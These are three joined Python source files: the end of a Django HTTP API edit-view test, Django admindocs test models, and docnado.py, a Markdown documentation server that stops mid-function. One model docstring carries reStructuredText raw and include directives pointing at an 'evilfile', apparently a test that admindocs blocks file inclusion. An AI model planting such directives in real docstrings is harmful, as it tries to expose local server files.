'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
def test_edit_view_no_event_url(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': 'http://messages/',
'http_api-push_event_url': '',
'http_api-metric_store': 'foo_metric_store',
})
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': None,
'push_message_url': 'http://messages/',
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
self.assertEqual(conversation.config, {})
response = self.client.get(conv_helper.get_view_url('edit'))
self.assertContains(response, 'http://messages/')
self.assertContains(response, 'foo_metric_store')
self.assertEqual(response.status_code, 200)
def test_edit_view_no_push_urls(self):
conv_helper = self.app_helper.create_conversation_helper()
conversation = conv_helper.get_conversation()
self.assertEqual(conversation.config, {})
response = self.client.post(conv_helper.get_view_url('edit'), {
'http_api-api_tokens': 'token',
'http_api-push_message_url': '',
'http_api-push_event_url': '',
'http_api-metric_store': 'foo_metric_store',
})
self.assertRedirects(response, conv_helper.get_view_url('show'))
reloaded_conv = conv_helper.get_conversation()
self.assertEqual(reloaded_conv.config, {
'http_api': {
'push_event_url': None,
'push_message_url': None,
'api_tokens': ['token'],
'metric_store': 'foo_metric_store',
'ignore_events': False,
'ignore_messages': False,
}
})
self.assertEqual(conversation.config, {})
response = self.client.get(conv_helper.get_view_url('edit'))
self.assertContains(response, 'foo_metric_store')
self.assertEqual(response.status_code, 200)
| StarcoderdataPython |
150184 | """
Models for testing various aspects of the djang.contrib.admindocs app
"""
from django.db import models
class Company(models.Model):
name = models.CharField(max_length=200)
class Group(models.Model):
name = models.CharField(max_length=200)
class Family(models.Model):
last_name = models.CharField(max_length=200)
class Person(models.Model):
"""
Stores information about a person, related to :model:`myapp.Company`.
**Notes**
Use ``save_changes()`` when saving this object.
``company``
Field storing :model:`myapp.Company` where the person works.
(DESCRIPTION)
.. raw:: html
:file: admin_docs/evilfile.txt
.. include:: admin_docs/evilfile.txt
"""
first_name = models.CharField(max_length=200, help_text="The person's first name")
last_name = models.CharField(max_length=200, help_text="The person's last name")
company = models.ForeignKey(Company, models.CASCADE, help_text="place of work")
family = models.ForeignKey(Family, models.SET_NULL, related_name='+', null=True)
groups = models.ManyToManyField(Group, help_text="has membership")
def _get_full_name(self):
return "%s %s" % (self.first_name, self.last_name)
def rename_company(self, new_name):
self.company.name = new_name
self.company.save()
return new_name
def dummy_function(self, baz, rox, *some_args, **some_kwargs):
return some_kwargs
@property
def a_property(self):
return 'a_property'
def suffix_company_name(self, suffix='ltd'):
return self.company.name + suffix
def add_image(self):
pass
def delete_image(self):
pass
def save_changes(self):
pass
def set_status(self):
pass
def get_full_name(self):
"""
Get the full name of the person
"""
return self._get_full_name()
def get_status_count(self):
return 0
def get_groups_list(self):
return []
| StarcoderdataPython |
9595 | """ docnado.py
A rapid documentation tool that will blow you away.
"""
import os
import re
import sys
import csv
import glob
import time
import signal
import shutil
import urllib
import base64
import hashlib
import argparse
import tempfile
import datetime
import threading
import traceback
import subprocess
import platform
import requests
from bs4 import BeautifulSoup
from multiprocessing import Pool
from urllib.parse import urlparse
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
from xml.etree import ElementTree
from flask import Flask, url_for, abort, send_from_directory, \
render_template, Markup, make_response, render_template_string
import markdown
import markdown.util
from markdown.extensions import Extension
from markdown.postprocessors import Postprocessor
from markdown.inlinepatterns import LinkPattern, IMAGE_LINK_RE, dequote, handleAttributes
from markdown.blockprocessors import HashHeaderProcessor
from http.client import responses
if __package__:
from .navtree import NavItem, parse_nav_string
else:
from navtree import NavItem, parse_nav_string
class MultiPurposeLinkPattern(LinkPattern):
""" Embed image, video, youtube, csv or file download links
by extending the typical image tag pattern.
#  or 
If the link has "DOWNLOAD" in the alt text, treat it as a download.
Otherwise, see if its a YouTube video. Otherwise, see if its a
csv that can be turned into a table, otherwise if the link cannot be parsed
as a video, it will always be treated as an image.
"""
SUPPORTED_VIDEO = ('ogv', 'ogg', 'avi', 'mp4', 'webm', )
SUPPORTED_TABLES = ('csv', )
SUPPORTED_PDF = ('pdf', )
def get_src(self, m):
""" Get the source and parts from the matched groups: src, parts """
src_parts = m.group(9).split()
if src_parts:
src = src_parts[0]
if src[0] == "<" and src[-1] == ">":
src = src[1:-1]
return self.sanitize_url(self.unescape(src)), src_parts
else:
return '', src_parts
@staticmethod
def youtube_url_validation(url):
""" Given a YouTube URL, return the ID component.
https://stackoverflow.com/questions/4705996
"""
youtube_regex = (r'(https?://)?(www\.)?'
r'(youtube|youtu|youtube-nocookie)\.(com|be)/'
r'(watch\?v=|embed/|v/|.+\?v=)?([^&=%\?]{11})')
youtube_regex_match = re.match(youtube_regex, url)
return youtube_regex_match.group(6) if youtube_regex_match else None
@staticmethod
def as_youtube(m, video_id):
""" Return a DOM element that embeds a YouTube video. """
el = ElementTree.Element('iframe')
el.set('class', 'video')
el.set('src', f'https://www.youtube.com/embed/{video_id}?rel=0')
el.set('frameborder', '0')
el.set('allow', 'autoplay; encrypted-media')
el.set('allowfullscreen', '1')
return el
def as_pdf(self, m):
""" Return a DOM element that embeds a PDF document using an embed. """
src, parts = self.get_src(m)
wrapper = ElementTree.Element('aside')
wrapper.set('class', 'pdf-embed-wrapper')
el = ElementTree.SubElement(wrapper, 'embed')
el.set('class', 'pdf-embed')
el.set('src', src)
el.set('width', '100%')
el.set('type', 'application/pdf')
el.set('height', '100%') # width * 1.4142 (aspect ratio of a4)
el.set('pluginspage', 'http://www.adobe.com/products/acrobat/readstep2.html')
if len(parts) > 1:
el.set('alt', dequote(self.unescape(" ".join(parts[1:]))))
return wrapper
def as_video(self, m):
""" Return a video element """
src, parts = self.get_src(m)
el = ElementTree.Element('video')
el.set('src', src)
el.set("controls", "true")
handleAttributes(m.group(2), el)
return el
def as_image(self, m):
""" Return an image element """
el = ElementTree.Element('img')
src, parts = self.get_src(m)
el.set('src', src)
# Set the title if present.
if len(parts) > 1:
el.set('title', dequote(self.unescape(" ".join(parts[1:]))))
# Set the attributes on the element, if enabled.
# Set the 'alt' attribute with whatever is left from `handleAttributes`.
attrs = self.markdown.enable_attributes
alt_text = handleAttributes(m.group(2), el) if attrs else m.group(2)
el.set('alt', self.unescape(alt_text))
return el
def as_csv(self, m):
src, parts = self.get_src(m)
root = ElementTree.Element('table')
root.set('source', src)
root.set('class', 'csv-table table thead-light table-hover')
file_path = os.path.join(self.markdown.page_root, src)
with open(file_path, 'r', encoding='utf-8') as f:
reader = csv.reader(f)
headers = next(reader)
rows = [r for r in reader]
thead = ElementTree.SubElement(root, 'thead')
for col in headers:
ElementTree.SubElement(thead, 'th').text = col
for row in rows:
tr = ElementTree.SubElement(root, 'tr')
for col in row:
ElementTree.SubElement(tr, 'td').text = col
return root
def as_download(self, m):
""" Create card layers used to make a download button. """
src, parts = self.get_src(m)
# Returns a human readable string representation of bytes
def _human_size(byte_number, units=(' bytes', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB')):
return str(byte_number) + units[0] if byte_number < 1024 else _human_size(byte_number >> 10, units[1:])
# Get information required for card.
split_src = os.path.split(src)
file_path = os.path.join(self.markdown.page_root, *split_src)
file_size = os.path.getsize(file_path)
file_basename = os.path.basename(file_path)
card_text = dequote(self.unescape(" ".join(parts[1:]))) if len(parts) > 1 else ''
# If its a pptx, extract the thumbnail previews.
# NOTE: This works, but is is removed until we support other
# file types, which for now is not a priority.
# preview_uri = None
# import zipfile
# if (file_path.endswith('pptx')):
# with zipfile.ZipFile(file_path) as zipper:
# with zipper.open('docProps/thumbnail.jpeg', 'r') as fp:
# mime = 'image/jpeg'
# data64 = base64.b64encode(fp.read()).decode('utf-8')
# preview_uri = u'data:%s;base64,%s' % (mime, data64)
# Card and structure.
card = ElementTree.Element("div")
card.set('class', 'card download-card')
header = ElementTree.SubElement(card, 'div')
header.set('class', 'download-card-header')
body = ElementTree.SubElement(card, 'div')
body.set('class', 'download-card-body')
# Add preview image.
# if preview_uri:
# img = ET.SubElement(header, 'img')
# img.set('src', preview_uri)
# Filename link heading.
heading = ElementTree.SubElement(body, 'a')
heading.set('class', 'download-card-title')
heading.set('href', src)
download_icon = ElementTree.SubElement(heading, 'i')
download_icon.set('class', 'fa fa-download')
download_text = ElementTree.SubElement(heading, 'span')
download_text.text = file_basename
# Title element from the "quote marks" part.
body_desc = ElementTree.SubElement(body, 'span')
body_desc.text = card_text
# File size span at the bottom.
body_size = ElementTree.SubElement(body, 'span')
body_size.set('class', 'small text-muted')
body_size.text = f'{_human_size(file_size)}'
return card
@staticmethod
def _is_inject(m):
""" Determine if the ALT text [] part of the link says 'INJECT'. """
alt = m.group(2)
return alt.lower() == 'inject'
def as_raw(self, m):
""" Load the HTML document specified in the link, parse it to HTML elements and return it.
"""
src, parts = self.get_src(m)
# Find the path to the HTML document, relative to the current markdown page.
file_path = os.path.join(self.markdown.page_root, src)
raw_html_string = read_html_for_injection(file_path)
if len(parts) < 2:
parts.append("nothing_one=1||nothing_two=2")
# Helper function.
def _argify(args):
if '=' not in args:
raise ValueError('injection template requires named arguments split by ||')
left, right = args.split('=')
return left.strip(), right.strip()
# Split arg string on double pipe. Joins them to undo automattic splitting from the markdown.
arg_strings = " ".join(parts[1:]).strip('\"').split("||")
# Parse into dictionary of key-value pairs based on the '=' notation.
try:
named_args = dict([_argify(args) for args in arg_strings])
except Exception as e:
raise Exception(f"Error parsing ![INJECT] arguments in {self.markdown.page_file} {repr(e)}")
# Take the template renderer and give it our string, and named args.
# Capture the output as a string.
try:
injectable_templated_str = render_template_string(raw_html_string, **named_args)
except Exception as e:
raise Exception(f"Error rendering ![INJECT] template for file {file_path} {repr(e)}")
# Feed that string to the XML parser.
try:
return ElementTree.fromstring(injectable_templated_str)
except Exception as e:
raise Exception(f"Error parsing ![INJECT] template for file {file_path} {repr(e)}")
@staticmethod
def _is_download(m):
""" Determine if the ALT text [] part of the link says 'DOWNLOAD'. """
alt = m.group(2)
return alt.lower() == 'download'
def handleMatch(self, m):
""" Use the URL extension to render the link. """
src, parts = self.get_src(m)
if self._is_download(m):
return self.as_download(m)
elif self._is_inject(m):
return self.as_raw(m)
youtube = self.youtube_url_validation(src)
if youtube:
return self.as_youtube(m, youtube)
src_lower = src.lower()
if src_lower.endswith(self.SUPPORTED_TABLES):
return self.as_csv(m)
elif src_lower.endswith(self.SUPPORTED_PDF):
return self.as_pdf(m)
elif src_lower.endswith(self.SUPPORTED_VIDEO):
return self.as_video(m)
return self.as_image(m)
class OffsetHashHeaderProcessor(HashHeaderProcessor):
""" Process hash headers with an offset to control the type of heading
DOM element that is generated. """
HEADING_LEVEL_OFFSET = 1
def run(self, parent, blocks):
block = blocks.pop(0)
m = self.RE.search(block)
if m:
before = block[:m.start()]
after = block[m.end():]
if before:
self.parser.parseBlocks(parent, [before])
heading_level = len(m.group('level'))
h = ElementTree.SubElement(parent, 'h%d' % (heading_level + self.HEADING_LEVEL_OFFSET))
h.text = m.group('header').strip()
if after:
blocks.insert(0, after)
class ChecklistPostprocessor(Postprocessor):
"""
Adds checklist class to list element.
Adapted from: `markdown_checklist.extension`
"""
pattern = re.compile(r'<li>\[([ Xx])\]')
def run(self, html):
html = re.sub(self.pattern, self._convert_checkbox, html)
before = '<ul>\n<li><input type="checkbox"'
after = before.replace('<ul>', '<ul class="checklist">')
html = html.replace(before, after)
return html
@staticmethod
def _convert_checkbox(match):
state = match.group(1)
checked = ' checked' if state != ' ' else ''
return '<li><input type="checkbox" disabled%s>' % checked
# Remove the `video`, `iframe`, `aside`, and `table` elements as block elements.
markdown.util.BLOCK_LEVEL_ELEMENTS = re.compile(
r"^(p|div|h[1-6]|blockquote|pre|dl|ol|ul"
r"|script|noscript|form|fieldset|math"
r"|hr|hr/|style|li|dt|dd|thead|tbody"
r"|tr|th|td|section|footer|header|group|figure"
r"|figcaption|article|canvas|output"
r"|progress|nav|main)$",
re.IGNORECASE
)
class MultiExtension(Extension):
""" Markdown `Extension` that adds our new components and
overrides some that we are not using.
"""
def extendMarkdown(self, md, md_globals):
""" Configure markdown by disabling elements and replacing them with
others. """
# Add checklist processing extension based on: 'markdown_checklist.extension'.
md.postprocessors.add('checklist', ChecklistPostprocessor(md), '>raw_html')
# Remove default patterns.
del md.inlinePatterns['image_link']
# Create a new one and insert into pipeline.
multi_purpose_pattern = MultiPurposeLinkPattern(IMAGE_LINK_RE, md)
md.inlinePatterns['multi_purpose_pattern'] = multi_purpose_pattern
# Remove line headers.
del md.parser.blockprocessors['setextheader']
# Swap hash headers for one that can change the DOM h1, h2 level.
md.parser.blockprocessors['hashheader'] = OffsetHashHeaderProcessor(md.parser)
# https://python-markdown.github.io/extensions/
mdextensions = [MultiExtension(),
'markdown.extensions.tables',
'markdown.extensions.meta',
'markdown.extensions.def_list',
'markdown.extensions.headerid',
'markdown.extensions.fenced_code',
'markdown.extensions.attr_list']
def build_meta_cache(root):
""" Recursively search for Markdown files and build a cache of `Meta`
from metadata in the Markdown.
:param root: str: The path to search for files from.
"""
doc_files = glob.iglob(root + '/**/*.md', recursive=True)
def _meta(path):
with open(path, 'r', encoding='utf-8') as f:
md = markdown.Markdown(extensions=mdextensions)
md.page_root = os.path.dirname(path)
Markup(md.convert(f.read()))
return md.Meta if hasattr(md, 'Meta') else None
doc_files_meta = {os.path.relpath(path, start=root): _meta(path) for path in doc_files}
doc_files_meta = {path: value for path, value in doc_files_meta.items() if value is not None}
# If a nav filter is set, exclude relevant documents.
# This takes the comma separated string supplied to `nav_limit`
# and excludes certain documents if they are NOT in this list.
global CMD_ARGS
if CMD_ARGS.nav_limit:
nav_filters = CMD_ARGS.nav_limit.split(',')
nav_filters = [nav_filter.strip().lower() for nav_filter in nav_filters]
nav_filters = [nav_filter for nav_filter in nav_filters if nav_filter]
def _should_include(doc_meta):
nav_strings = [nav.lower() for nav in doc_meta.get('nav', [])]
return any([y.startswith(x) for x in nav_filters for y in nav_strings])
doc_files_meta = {path: value for path, value in doc_files_meta.items() if _should_include(value)}
return doc_files_meta
def build_nav_menu(meta_cache):
""" Given a cache of Markdown `Meta` data, compile a structure that can be
used to generate the NAV menu.
This uses the `nav: Assembly>Bench>Part` variable at the top of the Markdown file.
"""
root = NavItem('root', 0)
# Pre-sort the nav-items alphabetically by nav-string. This will get overridden with the arange()
# function, but this avoids-un arranged items moving round between page refreshes due to Dicts being
# unordered.
sorted_meta_cache = sorted(
meta_cache.items(),
key = lambda items: items[1].get('nav', [''])[0].split('>')[-1] # Sort by the last part of the nav string for each page.
)
for path, meta in sorted_meta_cache:
nav_str = meta.get('nav', [None])[0]
nav_chunks = parse_nav_string(nav_str)
node = root
for name, weight in nav_chunks:
n = NavItem(name, weight)
node = node.add(n)
node.bind(meta=meta, link=path)
root.arrange()
return root
def build_reload_files_list(extra_dirs):
""" Given a list of directories, return a list of files to watch for modification
and subsequent server reload. """
extra_files = extra_dirs[:]
for extra_dir in extra_dirs:
for dirname, dirs, files in os.walk(extra_dir):
for filename in files:
filename = os.path.join(dirname, filename)
if os.path.isfile(filename):
extra_files.append(filename)
return extra_files
def read_html_for_injection(path):
""" Open an HTML file at the given path and return the contents
as a string. If the file does not exist, we raise an exception.
"""
# TODO: In the future, consider adding some caching here. However,
# beware of reloading / refereshing the page UX implications.
with open(path) as file:
return file.read()
def _render_markdown(file_path, **kwargs):
""" Given a `file_path` render the Markdown and return the result of `render_template`.
"""
global NAV_MENU, PROJECT_LOGO, PDF_GENERATION_ENABLED
default_template = 'document'
with open(file_path, 'r', encoding='utf-8') as f:
md = markdown.Markdown(extensions=mdextensions)
md.page_root = os.path.dirname(file_path)
md.page_file = file_path
markup = Markup(md.convert(f.read()))
# Fetch the template defined in the metadata.
template = md.Meta.get('template', None)
template = template[0] if template else default_template
if not template:
raise Exception('no template found for document')
template = f'{template}.html'
# Load any HTML to be injected from the meta-data.
injections = md.Meta.get('inject', [])
injections = [os.path.join(md.page_root, file) for file in injections]
injections = [read_html_for_injection(file) for file in injections]
# Render it out with all the prepared data.
return render_template(template,
content=markup,
nav_menu=NAV_MENU,
project_logo=PROJECT_LOGO,
pdf_enabled=PDF_GENERATION_ENABLED,
injections=injections,
**md.Meta,
**kwargs)
def configure_flask(app, root_dir):
""" Setup the flask application within this scope. """
@app.before_first_request
def build_navigation_cache():
""" Build an in-memory cache of document meta-data.
NOTE: The design choice is made to crash the application if any
of the markdown files cannot be opened and parsed. In the
future when it becomes more stable, this will probably change.
"""
# This is called each time the server restarts.
global NAV_MENU
meta_cache = build_meta_cache(root_dir)
# Build the nav menu data-structure.
NAV_MENU = build_nav_menu(meta_cache)
# Store the reference to the function that rebuilds the navigation cache.
app.build_navigation_cache = build_navigation_cache
@app.template_filter('gravatar')
def gravatar(email, size=100, rating='g', default='retro', use_ssl=False):
""" Return a gravatar link for a given email address. """
url = "https://secure.gravatar.com/avatar/" if use_ssl else "http://www.gravatar.com/avatar/"
email = email.strip().lower().encode('utf-8')
hash_email = hashlib.md5(email).hexdigest()
return f'{url}{hash_email}?s={size}&r={rating}&d={default}'
@app.template_filter()
def url_unquote(url):
""" Removes encoding around a URL. """
return urllib.parse.unquote(url)
@app.route('/favicon.ico')
def favicon():
return send_from_directory(os.path.join(app.root_path, 'static'),
'favicon.ico', mimetype='image/vnd.microsoft.icon')
@app.route("/print_header")
def print_header():
""" Render the template for the header used when printing with WKPDFTOHTML. """
global PROJECT_LOGO
return render_template('print_header.html', project_logo=PROJECT_LOGO)
@app.route("/print_footer")
def print_footer():
""" Render the template for the footer used when printing with WKPDFTOHTML. """
global PROJECT_LOGO
return render_template('print_footer.html', project_logo=PROJECT_LOGO)
@app.errorhandler(404)
def page_not_found(e):
global NAV_MENU, PROJECT_LOGO
return render_template('404.html', nav_menu=NAV_MENU, project_logo=PROJECT_LOGO), 404
@app.route("/w/<path:page>")
def wiki(page):
""" Render the page. """
file_path = os.path.abspath(os.path.join(root_dir, page))
if not os.path.isfile(file_path):
abort(404)
if '.md' in [ext.lower() for ext in os.path.splitext(file_path)]:
return _render_markdown(file_path, current_page=page)
else:
return send_from_directory(os.path.dirname(file_path), os.path.basename(file_path))
@app.route("/")
@app.route("/w/")
def homepage():
return wiki('home.md')
@app.route("/pdf/<path:page>")
def wiki_pdf(page):
file_path = os.path.abspath(os.path.join(root_dir, page))
if not os.path.isfile(file_path):
abort(404)
if '.md' not in [ext.lower() for ext in os.path.splitext(file_path)]:
return send_from_directory(os.path.dirname(file_path), os.path.basename(file_path))
# Configure the different paths.
pdf_temp = f'{tempfile.mktemp()}.pdf'
input_url = url_for('wiki', page=page, _external=True)
header_url = url_for('print_header', _external=True)
footer_url = url_for('print_footer', _external=True)
args = f'{WKHTMLTOPDF_BINARY} --header-html {header_url} --footer-html {footer_url} \
--print-media-type --header-spacing 2 {input_url} {pdf_temp}'
# Invoke WkHTMLtoPDF
result = subprocess.check_output(args, shell=True)
if not result:
pass
# Write the newly generated temp pdf into a response.
with open(pdf_temp, 'rb') as f:
binary_pdf = f.read()
target_file_name = page.replace("/", "_").replace("\\", "_")
response = make_response(binary_pdf)
response.headers['Content-Type'] = 'application/pdf'
# response.headers['Content-Disposition'] = f'attachment; filename={target_file_name}.pdf'
response.headers['Content-Disposition'] = f'inline; filename={target_file_name}.pdf'
# Delete the temp file and return the response.
os.remove(pdf_temp)
return response
def generate_static_pdf(app, root_dir, output_dir, nav_filter=None):
""" Generate a static PDF directory for the documentation in `root_dir`
into `output_dir`.
"""
global PORT_NUMBER
# Find all markdown document paths that are in the nav.
documents = build_meta_cache(root_dir)
markdown_docs_urls = ['pdf/' + file.replace('\\', '/') for file in documents.keys()]
# Generate URl to file pairs.
pairs = [(f'http://localhost:{PORT_NUMBER}/{url}',
f'{os.path.join(output_dir, *os.path.split(url))}.pdf')
for url in markdown_docs_urls]
# Download each pair.
for source, target in pairs:
os.makedirs(os.path.dirname(target), exist_ok=True)
print(f'Source: {source} \n Target: {target}')
urllib.request.urlretrieve(source, target)
# Helper function to return the domain if present.
def is_absolute(url):
""" Returns True if the passed url string is an absolute path.
False if not
"""
links = urlparse(url)
return bool(links.netloc)
def generate_static_html(app, root_dir, output_dir):
""" Generate a static HTML site for the documentation in `root_dir`
into `output_dir`.
"""
from flask_frozen import Freezer, MissingURLGeneratorWarning
import warnings
warnings.filterwarnings("ignore", category=MissingURLGeneratorWarning)
# Update the flask config.
app.config['FREEZER_RELATIVE_URLS'] = True
app.config['FREEZER_IGNORE_MIMETYPE_WARNINGS'] = True
app.config['FREEZER_DESTINATION'] = output_dir
# Create the freezer app. Make it use specific URLs.
freezer = Freezer(app, with_no_argument_rules=False, log_url_for=False)
# Register a generator that passes ALL files in the docs directory into the
# `wiki` flask route.
@freezer.register_generator
def wiki():
all_docs = [file.replace(f'{root_dir}', '/w').replace(f'{os.path.sep}', '/')
for file in glob.iglob(f'{root_dir}/**/*', recursive=True)
if os.path.isfile(file)]
for doc in all_docs:
yield doc
# Save all the URLs using the correct extension and MIME type.
freezer.freeze()
# For each `.md` file in the output directory:
for markdown_file in glob.iglob(f'{output_dir}/**/*.md', recursive=True):
# Rewrite all relative links to other `.md` files to `.html.`
output = ''
with open(markdown_file, 'r', encoding="utf-8") as f:
html = f.read()
def _href_replace(m):
href = m.group()
if is_absolute(href[6:-1]):
return href
return href.replace('.md', '.html')
output = re.sub('href="(.*md)"', _href_replace, html)
# Rename the file from `.md` to HTML.
with open(markdown_file[:-3] + '.html', 'w', encoding="utf-8") as f:
f.write(output)
# Delete the Markdown file.
os.remove(markdown_file)
def load_project_logo(logo_file=None):
""" Attempt to load the project logo from the specified path.
If this fails, return None. If this succeeds, convert it to a data-uri.
"""
if not logo_file:
return None
if not os.path.exists(logo_file):
return None
with open(logo_file, 'rb') as fp:
mime = 'image/png'
data64 = base64.b64encode(fp.read()).decode('utf-8')
preview_uri = u'data:%s;base64,%s' % (mime, data64)
return preview_uri
def check_pdf_generation_cap():
""" Check to see if we can use PDF generation by attempting to use the binary. """
global WKHTMLTOPDF_BINARY
retcode = subprocess.call(f'{WKHTMLTOPDF_BINARY} --version',
shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
return retcode == 0
def copy_local_project(force=False):
""" Copy the sample docs and style into the local working directory.
Note: This will overwrite anything currently in those folders.
"""
source_root = os.path.dirname(__file__)
target_root = os.getcwd()
targets = ['docs', 'style', 'logo.png']
pairs = [(os.path.join(source_root, path), os.path.join(target_root, path))
for path in targets]
for source, target in pairs:
if os.path.isdir(source):
if os.path.exists(target):
if force:
print(f'Deleting existing {target} and replacing it with {target}')
shutil.rmtree(target)
shutil.copytree(source, target)
else:
print(f'Warning: {target} already exists.')
else:
print(f'Copying: {source} -> {target}')
shutil.copytree(source, target)
else:
if os.path.exists(target):
if force:
print(f'Deleting existing {target} and replacing it with {target}')
os.remove(target)
shutil.copyfile(source, target)
else:
print(f'Warning: {target} already exists.')
else:
print(f'Copying: {source} -> {target}')
shutil.copyfile(source, target)
def find_references(document_path):
""" Search through the markdown 'document_path' and make a list of referenced files
with paths that are relative to the directory containing the `document_path`.
"""
# Open the file to search.
with open(document_path, 'r', encoding='utf-8') as f:
markdown_raw_data = f.read()
# Render as HTML.
md = markdown.Markdown(extensions=mdextensions)
document_dir = os.path.dirname(document_path)
md.page_root = document_dir
# Interpret with the BeautifulSoup HTML scraping library.
soup = BeautifulSoup(md.convert(markdown_raw_data), 'html.parser')
tags_to_search = {
'img': 'src',
'a': 'href',
'video': 'src',
'table': 'source',
'embed': 'src',
}
# For each entry in the `tags_to_search` table, extract the tag attribute value.
references = set()
for k, v in tags_to_search.items():
for tag in soup.find_all(k):
val = tag.get(v)
if val:
references.add(val)
# Normalise the referenced assets (to take into account relative paths).
references = [os.path.join(document_dir, urllib.request.url2pathname(ref)) for ref in references]
# Make unique.
return set(references)
def has_nav(markdown_text):
""" Returns True if the passed string of text contains navbar metadata.
Returns False if it does not.
"""
expression = re.compile(r'(?=\n|)nav:\s+\w+(?=\n |)')
return True if expression.search(markdown_text) else False
def find_orphans(files):
""" Searches all files and folders recursively in the given path for image and video assets
that are unused by markdown files.
"""
# Find all references in
pages = {}
for file in files:
if file.endswith('.md'):
pages[file] = find_references(file)
# Remove the markdown documents that have a navbar metadata.
md_with_nav = []
for file in files:
if file.endswith('.md'):
with open(file, encoding='utf-8') as f:
if has_nav(f.read().lower()):
md_with_nav.append(file)
files = [x for x in files if x not in md_with_nav]
# Create a flat list of all references in the markdown files
all_references = []
for i in pages.values():
all_references += [k for k in i]
# Output unused assets
return [i for i in files if i not in all_references]
class DocumentLinks:
""" A helper class to process the `<a href.../>` links from a single
markdown document that is rendered using our own renderer.
"""
def __init__(self, md_file):
""" Open a Markdown document and find all links in `<a href .../>`.
"""
# Store important information about this document.
self.md_file = md_file
self.md_dir = os.path.dirname(md_file)
# Read in Markdown and generate HTML with our parser.
with open(md_file, 'r', encoding='utf-8') as f:
markdown_raw_data = f.read()
md = markdown.Markdown(extensions=mdextensions)
md.page_root = self.md_dir
html = md.convert(markdown_raw_data)
# Interpret with the BeautifulSoup HTML scraping library.
soup = BeautifulSoup(html, 'html.parser')
tags_to_search = {
'img': 'src',
'a': 'href',
'video': 'src',
'table': 'source',
'embed': 'src',
}
self.references = set()
for k, v in tags_to_search.items():
links = soup.find_all(k)
for link in links:
if link.get('href'):
if link.get('href').find('http:') > -1 or link.get('href').find('https:') > -1:
val = link.get(v)
if val:
self.references.add(val)
else:
val = link.get(v)
if val:
self.references.add(val)
@property
def web_links(self):
""" Generate a list of web links from our cached links.
"""
return [link for link in self.references if is_absolute(link)]
@property
def relative_links(self):
""" Generate a list of relative file system links from our cached links.
This converts from a web path to a path on disk then normalises the path to the current directory.
"""
def _norm(path):
return os.path.join(self.md_dir, urllib.request.url2pathname(path))
return [_norm(link) for link in self.references if not is_absolute(link)]
@staticmethod
def validate_url(address):
""" Returns `True` if page at address returns with status code 200 (ok) otherwise returns `False`.
"""
try:
request = requests.head(address)
return request.status_code, address
except requests.exceptions.RequestException:
return False, address
def detect_broken_links(self, process_pool):
""" Go through all the `web_links` and the `relative_links` and report
which are broken (i.e. do not resolve to HTTP200OK or a file on disk).
"""
result = process_pool.map(self.validate_url, self.web_links)
for response, url in result:
if not response == 200:
yield url + ' Status: ' + (responses[response] if response is int else "Exception")
for file in self.relative_links:
if not os.path.exists(file):
yield file
def generate_metadata(path):
""" Add relevant metadata to the top of the markdown file at the passed path.
Title is drawn from the filename, Date from the last modified timestamp, Version defaults at 1.0.0,
Nav is generated from the filepath, and Authors are generated from the git contributors (if applicable) and
are otherwise left blank.
Warning: Does not check if there is existing metadata.
"""
s = subprocess.getoutput(f"git log -p {path}")
lines = s.split(os.linesep)
authors = set([re.search(r'<(.*)>', line).group(1)for line in lines if 'Author:' in line])
file_status = os.stat(path)
nav_path = os.path.sep.join(path.split(os.path.sep)[1:])
metadata = {
'title': ' '.join(
path
.split('.')[0]
.split(os.path.sep)[-1]
.replace('_', ' ')
.replace('-', ' ')
.title()
.split()
),
'desc': '',
'date': datetime.datetime.utcfromtimestamp(file_status.st_mtime).strftime('%Y/%m/%d'),
'version': '1.0.0',
'template': '',
'nav': nav_path.replace(os.path.sep, '>').title().split('.')[0],
'percent': '100',
'authors': ' '.join(authors),
}
result = ""
for key in metadata.keys():
result += ('{}:{}{}\n'.format(key, '\t' if len(key) > 6 else '\t\t', metadata[key]))
with open(path, 'r+', encoding='utf-8') as f:
content = f.read()
f.seek(0, 0)
f.write(result)
f.write(content)
class ReloadHandler(PatternMatchingEventHandler):
""" Rebuild the document metadata / navigation cache when markdown files are updated
in the documents directory. """
def __init__(self, app):
super(ReloadHandler, self).__init__(patterns=['*.md'], ignore_directories=False, case_sensitive=False)
self.flask_app = app
def on_any_event(self, event):
self.flask_app.build_navigation_cache()
global CMD_ARGS, NAV_MENU, PROJECT_LOGO, WKHTMLTOPDF_BINARY, PDF_GENERATION_ENABLED, PORT_NUMBER
CMD_ARGS = None
NAV_MENU = {}
PROJECT_LOGO = None
WKHTMLTOPDF_BINARY = None
PDF_GENERATION_ENABLED = False
def main():
""" Application entrypoint. """
global PORT_NUMBER
PORT_NUMBER = 5000
# Parse the command line arguments.
parser = argparse.ArgumentParser(description='docnado: Lightweight tool for rendering \
Markdown documentation with different templates.')
parser.add_argument('--html', action='store', dest='html_output_dir',
help='Generate a static site from the server and output to the \
specified directory.')
parser.add_argument('--pdf', action='store', dest='pdf_output_dir',
help='Generate static PDFs from the server and output to the \
specified directory.')
parser.add_argument('--nav-limit', action='store', dest='nav_limit',
default=None,
help='Include certain document trees only based on a comma separated \
list of nav strings. e.g. Tooling,Document')
parser.add_argument('--new', action="store_true", dest='new_project',
default=False,
help='Copy the `docs` and `styles` folder into the working directory \
and output a config file that addresses them. Does not overwrite existing files.')
parser.add_argument('--new-force', action="store_true", dest='new_project_force',
default=False,
help='Copy the `docs` and `styles` folder into the working directory \
and output a config file that addresses them. Force deletion of existing files.')
parser.add_argument('--dirs', action="store_true", dest='show_dirs',
default=False,
help='Display the different directories the software is using \
to search for documentation and styles.')
parser.add_argument('--generate-meta', action="store", dest='generate_meta',
default=False,
help='Generate metadata for markdown files in the specified directory.')
parser.add_argument('--find-orphans', action="store_true", dest='find_orphans',
default=False,
help='Identify unused media assets (orphans)')
parser.add_argument('--find-broken-links', action="store_true", dest='find_broken_links',
default=False,
help='Identify broken external links.')
